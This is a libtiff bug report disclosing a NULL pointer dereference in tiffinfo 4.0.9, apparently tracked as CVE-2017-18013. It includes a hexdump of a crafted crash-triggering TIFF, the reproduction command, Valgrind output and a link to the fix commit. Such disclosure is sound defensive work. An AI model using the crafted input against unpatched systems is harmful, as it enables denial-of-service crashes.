You need to log in before you can comment on or make changes to this bug.
Created an attachment (id=838) [details] Crafted TIFF Image to trigger the Crash There is a Null-Pointer Dereference occurring with tiffinfo.c in libtiff 4.0.9. This can be triggered by running the following command: tiffinfo -s %file% Where a malformed TIFF file is being supplied for parsing. The hexdump of the file causing the crash is: 0000000 4d4d 2a00 0000 0800 1700 3030 3030 3030 0000010 3030 3030 3030 0001 0300 0000 0100 3030 0000020 3030 0101 0300 0000 0100 3030 3030 3030 0000030 3030 3030 3030 3030 3030 0301 0300 0000 0000040 0100 0600 3030 3030 3030 3030 3030 3030 0000050 3030 1101 0400 3030 3030 3030 3030 3030 0000060 3030 3030 3030 3030 3030 3030 3030 3030 * 000011e The relevant Memcheck output is: ==24890== Process terminating with default action of signal 11 (SIGSEGV) ==24890== Access not within mapped region at address 0x0 ==24890== at 0x432F02: TIFFPrintDirectory (tif_print.c:673) ==24890== by 0x4027EF: tiffinfo (tiffinfo.c:463) ==24890== by 0x402406: main (tiffinfo.c:152) The NULL Pointer Dereference seems to get triggered while parsing the "1 Strips: " section of the image in the function call TIFFPrintDirectory, where a fprintf call is being made with a NULL pointer. The output of tiffinfo while running the command on this file is: ./tiffinfo -s tiff_npd TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order. TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered. TIFFReadDirectory: Warning, Photometric tag is missing, assuming data is YCbCr. TIFFReadDirectory: Warning, BitsPerSample tag is missing, assuming 8 bits per sample. TIFFReadDirectory: Warning, SamplesPerPixel tag is missing, applying correct SamplesPerPixel value of 3. tiff_npd: Old-style JPEG compression support is not configured. TIFF Directory at offset 0x8 (8) Image Width: 12336 Image Length: 12336 Bits/Sample: 8 Compression Scheme: Old-style JPEG Photometric Interpretation: YCbCr Samples/Pixel: 3 Planar Configuration: single image plane 1 Strips: Segmentation fault Debug info: libtiff version 4.0.9 OS: Ubuntu 17.10 Compiler: gcc 7.2.0 / clang 4.0.1-6 Target: x86-64-pc-linux-gnu
Fixed per https://gitlab.com/libtiff/libtiff/commit/c6f41df7b581402dfba3c19a1e3df4454c551a01
This issue has been assigned CVE-2017-18013